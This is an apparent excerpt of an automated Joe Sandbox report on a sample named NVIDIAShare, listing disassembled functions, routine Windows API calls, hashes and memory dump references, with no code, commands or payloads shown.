Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4f5d66685e822d19c7e8ababc43881871fb682f0d7bd1bec4fb151bea7444e50
Instruction ID: fe4d38d393a194c0a53231235e5716946bc7e6383fb83103c02cfbfdec819026
Opcode Fuzzy Hash: 4f5d66685e822d19c7e8ababc43881871fb682f0d7bd1bec4fb151bea7444e50
Instruction Fuzzy Hash: F6C1AF30A006559BFF66EF68C494BA97BE5AF05310F0801FAED859F2C6DB31D944CB61

Function 01003BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01003BBF

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 44de802298231c905d95ad1fbc3fc71e45f273cbe89200b68e0056b8c93e4fc8
Instruction ID: 56fb610919c4082d76d3dc5e0a3f029569259108a51299a64f476c77603556db
Opcode Fuzzy Hash: 44de802298231c905d95ad1fbc3fc71e45f273cbe89200b68e0056b8c93e4fc8
Instruction Fuzzy Hash: 5D71B471540B859EEB27DB74C8549EBB7E9AF24300F40496EE6EB8B2C1DA326584CF11

Function 01008284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01008289

Part of subcall function 010013DC: __EH_prolog.LIBCMT ref: 010013E1

Part of subcall function 0100A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 6fe45e873539fc8f7c1fe9122511e4b7291e6ff6ba8005cf56c7fcf986602d45
Instruction ID: 5f88e9b963bf67398d26c115f1d1c092a74f3649fe068ad1451095828ce5ad8a
Opcode Fuzzy Hash: 6fe45e873539fc8f7c1fe9122511e4b7291e6ff6ba8005cf56c7fcf986602d45
Instruction Fuzzy Hash: C841D671D446599AEB22DB60CC54AEEB7B8BF54304F0484EBE1CA570D2EB755BC4CB10

Function 010013E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 010013E1

Part of subcall function 01005E37: __EH_prolog.LIBCMT ref: 01005E3C

Part of subcall function 0100CE40: __EH_prolog.LIBCMT ref: 0100CE45

Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 69312da0c5e037cafb32245d82483277a16830d08c1d6f3a501f4c7bd1ff7e09
Instruction ID: cec93fc24bb8fee3a2c314a4ccbc9c33a426a5b10bb4467c275949e2cd0074e7
Opcode Fuzzy Hash: 69312da0c5e037cafb32245d82483277a16830d08c1d6f3a501f4c7bd1ff7e09
Instruction Fuzzy Hash: 3C4147B0905B419EE725DF398884AEBFBE5BF28300F50492ED5FE87281CB726654CB10

Function 010013DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 010013E1

Part of subcall function 01005E37: __EH_prolog.LIBCMT ref: 01005E3C

Part of subcall function 0100CE40: __EH_prolog.LIBCMT ref: 0100CE45

Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9eb4bcadbec23a800fe2701621e87708881efe2a7862c605bcea76c8e421ee3d
Instruction ID: bc2e4b4b238ef7f57742b5714fdac663143d566066f4b237bbba39a9be90b25b
Opcode Fuzzy Hash: 9eb4bcadbec23a800fe2701621e87708881efe2a7862c605bcea76c8e421ee3d
Instruction Fuzzy Hash: C94158B0905B419EE725DF798884AE7FBE5BF28300F50492ED5FE83281CB766654CB10

Function 0101B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0101B098

Part of subcall function 010013DC: __EH_prolog.LIBCMT ref: 010013E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 64724e6e4eed0f4cecf13058b192c8dfd7ac8179458c9ca0bda29a17c0f87f96
Instruction ID: 77947289f8eea9fb37141fcc8883db1782b4c376b04e96639b908dc7cd430865
Opcode Fuzzy Hash: 64724e6e4eed0f4cecf13058b192c8dfd7ac8179458c9ca0bda29a17c0f87f96
Instruction Fuzzy Hash: 2A317E71C0024AAFDF15DF68D8509EEBBB4AF19300F50449ED889B7281D739AE04CB61

Function 0102AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,01033A34), ref: 0102ACF8

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: fea9311c1bbcc58cf046fc192371e5c0beb6ef37599f657992c8a45585dbf908
Instruction ID: cb2e74e7096d96f92e4c3f95ccaa25d403a0aaedb4e00a7de838c3bdcab58bf7
Opcode Fuzzy Hash: fea9311c1bbcc58cf046fc192371e5c0beb6ef37599f657992c8a45585dbf908
Instruction Fuzzy Hash: B3110A33700639DF9B32AD2CD84099E77D6AB842607264261FDD6EB648DF35DC0187D0

Function 01009215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0100921A

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ff71ff36cac491c89ee3df3b949d6564069a63c60eee0b1886ccce2af47c8448
Instruction ID: a5516518c51d1e88399560a690ae40ed458da0b32bbdddd2d6803122b6240b76
Opcode Fuzzy Hash: ff71ff36cac491c89ee3df3b949d6564069a63c60eee0b1886ccce2af47c8448
Instruction Fuzzy Hash: A301A533900929ABDF13ABA8CD809DEB775BFA8654F014115E996B7191DA34C900C7A0

Function 0102C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0102B136: RtlAllocateHeap.NTDLL(00000008,01033A34,00000000,?,0102989A,00000001,00000364,?,?,?,0100D984,?,?,?,00000004,0100D710), ref: 0102B177

_free.LIBCMT ref: 0102C4E5

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: 8542809aa5592354d0549eb23996b790efe3b78644f5571643ab30aa1b88802f
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: 6401DB722003155BF3318E59984596EFBE9FB85270F65055DD5D483281EA30A905C764

Function 0102B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,01033A34,00000000,?,0102989A,00000001,00000364,?,?,?,0100D984,?,?,?,00000004,0100D710), ref: 0102B177

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cabcb3d475f7f0ca561821c1a000aa4e3ce63e5fffa1e78470a796463ae9a05b
Instruction ID: 3734e2a0151760341e89f13a8d2ec74c3a40d283cae5fae9a5574b42db4d069a
Opcode Fuzzy Hash: cabcb3d475f7f0ca561821c1a000aa4e3ce63e5fffa1e78470a796463ae9a05b
Instruction Fuzzy Hash: 89F0B43250513567FB715A26AC05B9F3B88AB91770BB8C151E9C89B190CA30D90183E0

Function 01023C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 01023C3F

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: ca2948b6215143db9662ff26e1177afafa980f8dbb060494f347ce261efd399f
Instruction ID: 5c654ee7116b342b02a3a46c1418474835b8131b5591d5f59751335c8fee03aa
Opcode Fuzzy Hash: ca2948b6215143db9662ff26e1177afafa980f8dbb060494f347ce261efd399f
Instruction Fuzzy Hash: 4BF0A73220022A9F9F124E6EEC1099A7BD9FF49B207204124FB85DF190DB35E420C790

Function 01028E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1ca9b14d87cd35ae73b6d311ca7b21e72faa09b4c9e1e08fd8752185ff95eb78
Instruction ID: 6e3ad07e0d3cb5a1f467e574a9a54423315807e4e8bdd9bd534dc7f4a81142fb
Opcode Fuzzy Hash: 1ca9b14d87cd35ae73b6d311ca7b21e72faa09b4c9e1e08fd8752185ff95eb78
Instruction Fuzzy Hash: 34E0653960613556EEB126699C04B9F7ACC9F517B4F15C193EDD897080CB65CC0082E1

Function 01005ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01005AC2

Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5c9cb1e471cee9b88f5bcca5426f7c0d36ef21cc8cfb1d0eec12008dffda73da
Instruction ID: 95c004d0d7deed5b4b6e06d9f91013bd735eaeffec939151e846667c64675ba9
Opcode Fuzzy Hash: 5c9cb1e471cee9b88f5bcca5426f7c0d36ef21cc8cfb1d0eec12008dffda73da
Instruction Fuzzy Hash: 1C018C30810695DAD726E7B8C0407DDFBA4BF78204F60888D94DA53285CBB81B08D7A2

Function 0100A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0100A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6C4
Part of subcall function 0100A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6F2
Part of subcall function 0100A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 6d7457f10a0d7fc31f6e8336a68044539e04b98b38a236259cc851e548fa7f16
Instruction ID: 756d466e9db7a9a8472cc89dc540bce24e4fd6ca8a202e3e87f9ba7bc4b1c80d
Opcode Fuzzy Hash: 6d7457f10a0d7fc31f6e8336a68044539e04b98b38a236259cc851e548fa7f16
Instruction Fuzzy Hash: 60F05E35009790EAEA6367B88904BCBBBA46F2A332F048A49F1F9531D5C37650948B22

Function 01010E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 01010E3D

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 101240a25dc0115856865d5a50dfc545165bb877ce10b2337d70e74e2bd91fcb
Instruction ID: a647dc6ef2056e2f0035351e986774ff2540b64a2fcbc12faf9c71d53334b519
Opcode Fuzzy Hash: 101240a25dc0115856865d5a50dfc545165bb877ce10b2337d70e74e2bd91fcb
Instruction Fuzzy Hash: 05D0C230B0106A16EA6633396494BFE298B9FE6210F0C0065B2C55B2CECAAE0482A261

Function 0101A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0101A62C

Part of subcall function 0101A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0101A3DA

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: b756999aa64b5d282eb878efbe0ab4a01eab456bea9e215b03cb9147fe51894d
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 3DD0A93030120AFAEF426B21CC02AAF7AA9EB58240F008421BCC2C6184EAB9D9109261

Function 0101DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,01011B3E), ref: 0101DD92

Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
Part of subcall function 0101B568: IsDialogMessageW.USER32(0001044E,?), ref: 0101B59E
Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 9b6ed345331ff3b54f0b234b7c94673597f7cb20d0bf0a8d405792b3c2dd822e
Instruction ID: 0dbb338a7048243b39e188002a5bb92d0cb4d8cdd38cea8fbcb1ecc6a1ebdd9b
Opcode Fuzzy Hash: 9b6ed345331ff3b54f0b234b7c94673597f7cb20d0bf0a8d405792b3c2dd822e
Instruction Fuzzy Hash: 80D09E71144300BBD6112B51CE06F4A7AB2BB99B04F404955B3C4740B4CA779D61EB11

Function 0101E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 0101E5E3

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

